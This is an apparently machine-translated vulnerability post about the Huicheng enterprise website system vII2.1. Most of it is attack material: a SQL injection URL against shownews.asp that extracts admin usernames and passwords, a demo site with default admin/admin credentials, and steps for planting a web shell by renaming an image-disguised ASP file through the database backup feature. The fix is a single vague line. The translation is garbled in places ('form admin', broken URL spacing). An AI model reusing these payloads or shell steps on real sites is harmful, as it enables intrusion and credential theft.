Huicheng decoration industry enterprise website system vII2.1 injection vulnerability exploitation and repair

Product Introduction:

Has common modules and functions of Enterprise websites: Enterprise Profile module, contact us module, News (Article) module, product

Module, image module, recruitment module, online message, feedback system, online communication, links, website maps,

Topic management, website fragment, administrator, and permission management. All modules support unlimited classification.

The scalability is very powerful. This includes the omnipotent column management system and website fragment management system.

And can combine different pages and applications. The system provides powerful and flexible background management functions and supports pseudo-static

The URL page function, custom Banner, LOGO function, and so on can create an elegant and Marketing Public

Company website.

Vulnerability file: shownews. asp

Use pangolin cookie injection tool to Crack user name management

Exp: http://www.bkjia.com/shownews. asp? Id = 338 and 1 = 2 union select

1, username, password, 4, 5, 6, 7, 8, 9, 10 form admin

 

 

Demo address: http://www.shengmake.net/ceshi/zhuanghuang/

Default background:/admin

User: admin

Pass: admin

It is very simple to use shell in the background, there is a database backup, the image horse backup is asp, it will be OK, and finally the path to copy asp

From sentiment blog

Www.2cto.com solution:

Enhance cookie injection filtering and Verification